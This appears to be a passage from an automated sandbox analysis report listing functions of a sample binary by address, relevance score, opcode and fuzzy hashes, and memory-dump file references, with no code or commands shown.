                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: \nt
                                                                                                                                                                                                                                                                  • API String ID: 0-921828810
                                                                                                                                                                                                                                                                  • Opcode ID: 93b39ec622091d085dc19b131531a9caf7f8762345a0df0e8db217bc715b20a4
                                                                                                                                                                                                                                                                  • Instruction ID: 05ce94f54ad84ed51e81e90a3a2be0d5180bf833bd04bdd332df9b62695d33a1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93b39ec622091d085dc19b131531a9caf7f8762345a0df0e8db217bc715b20a4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AE06539A10245EFCB45CBA9C564A49B7FAEB4AB84F2180B9E809D7350D338DE40CB80
                                                                                                                                                                                                                                                                  Function 006C43D7 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                                                                                                                                                  • API String ID: 0-595813830
                                                                                                                                                                                                                                                                  • Opcode ID: 3dc8b733bdccfe566bc790f7716e71aae9cf3bc6d85ea6bdb88b76e7e9e3d54f
                                                                                                                                                                                                                                                                  • Instruction ID: 3c19383690455f26b062c1e8da10256a620a7d3dfed57ac35da7c041fb1d7825
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3dc8b733bdccfe566bc790f7716e71aae9cf3bc6d85ea6bdb88b76e7e9e3d54f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5E0C23768463C73823022906C06FB97A86CF51BB2B058062FB0865290DEA54861C2C5
                                                                                                                                                                                                                                                                  Function 006D477F Relevance: .6, Instructions: 558COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 397187078afbc73a77af68bd91820e66db5ac4c2a21b4e6c1584caad7e47903e
                                                                                                                                                                                                                                                                  • Instruction ID: 40b9790a9efc1c881de3ecc1cf5937b4ecad01d08bcbf2d557374b2b200396d4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 397187078afbc73a77af68bd91820e66db5ac4c2a21b4e6c1584caad7e47903e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BB1F4359007419BDB389B25CC92BF7B3AAEF44308F54452EEA8386784EE75ED85CB44
                                                                                                                                                                                                                                                                  Function 006941FB Relevance: .5, Instructions: 481COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 871e5e318aa003df20044793efda66ac3184649c55973e2f25afc2ba23d78642
                                                                                                                                                                                                                                                                  • Instruction ID: ace8906d21182bb1ae624ff458229cf6bc625ef28534c041d6340f23763bcae6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 871e5e318aa003df20044793efda66ac3184649c55973e2f25afc2ba23d78642
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C122E71A002259FDF25CF58C880BAAB7FEBB46704F4441EAD949EB645DB709E42CF81
                                                                                                                                                                                                                                                                  Function 00697820 Relevance: .4, Instructions: 449COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: afc2b821aa198aa524a1ff759968927ee86305dc12ef67fe0f7c47614dbe355b
                                                                                                                                                                                                                                                                  • Instruction ID: ce7534d6d3f1ec1e610e20a8251d5e791ac0c43fb60edbc3a60d09ccb91aea7d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: afc2b821aa198aa524a1ff759968927ee86305dc12ef67fe0f7c47614dbe355b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07F14F71E142199FDF14CF68D880AEDB7B6FF88314F158269E819AB784D730AE41CB94
                                                                                                                                                                                                                                                                  Function 006983D0 Relevance: .4, Instructions: 386COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: ea7131a454b09939ba4f5b4ec26593bcd2b4292e7448b858b17d3e2100c931d0
                                                                                                                                                                                                                                                                  • Instruction ID: 1d9b420e9d8a5c8f08a50573092b7a3777409910673fc7acc372380333a2cdfc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea7131a454b09939ba4f5b4ec26593bcd2b4292e7448b858b17d3e2100c931d0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDE15F71A002289FDF65DF54C890BEAB7BEEF46304F1440EAD949AB745DB309E418F81
                                                                                                                                                                                                                                                                  Function 006CC2C1 Relevance: .3, Instructions: 337COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 26037e08150b049d539549e03706b158b61703474c7f3de4826ac7da6a377219
                                                                                                                                                                                                                                                                  • Instruction ID: 9023b3128d9cc9843cbc7c679e65fdaffaac2d4edcd54726a74e97abdf299d34
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26037e08150b049d539549e03706b158b61703474c7f3de4826ac7da6a377219
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CB106729042559FDB158F68C891FFEBBE6EF59320F15816EE409EB341D235AD02C7A0
                                                                                                                                                                                                                                                                  Function 00697E90 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9ff0a415577c8fbee0802c1f89845ac2a2450d0ccadb9b26d2d9d7c32b155c6d
                                                                                                                                                                                                                                                                  • Instruction ID: ef10fc0b56e1965e55bba62e6f110d5fb442f102558aa12bd3790144060c8050
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ff0a415577c8fbee0802c1f89845ac2a2450d0ccadb9b26d2d9d7c32b155c6d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7A12375A001298FCF24DF18C8917EDB7BAFB89304F1541EAD809A7741DB719E868F80
                                                                                                                                                                                                                                                                  Function 00694F90 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: ddb4ed16fa27ec0560be4d488ab72f8330fd0b800a7517f9d820764fe33525ff
                                                                                                                                                                                                                                                                  • Instruction ID: 4b388de0b8f238578912308c40dbf3b5082f20da68c61238bebff930a5a7e0a9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddb4ed16fa27ec0560be4d488ab72f8330fd0b800a7517f9d820764fe33525ff
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40516171E00219AFDF15CF99C981AEEBBB6EF88300F19805DE515AB341D734AE51CB94
                                                                                                                                                                                                                                                                  Function 006D26B3 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 1b9b0b4fa2faa95f0fefef11c3fe2977cee0889fa130319d2b42e11fb4690532
                                                                                                                                                                                                                                                                  • Instruction ID: c82fb5c71c826e6f8b56eeeaba45e77bef0085dd33100e5a67d532a56d5de66b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b9b0b4fa2faa95f0fefef11c3fe2977cee0889fa130319d2b42e11fb4690532
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FE08C7291127CEBCB14DB98C90498AF3FDEB88B00B21009AF501D3200C2B0DE40C7E4
                                                                                                                                                                                                                                                                  Function 006D2516 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
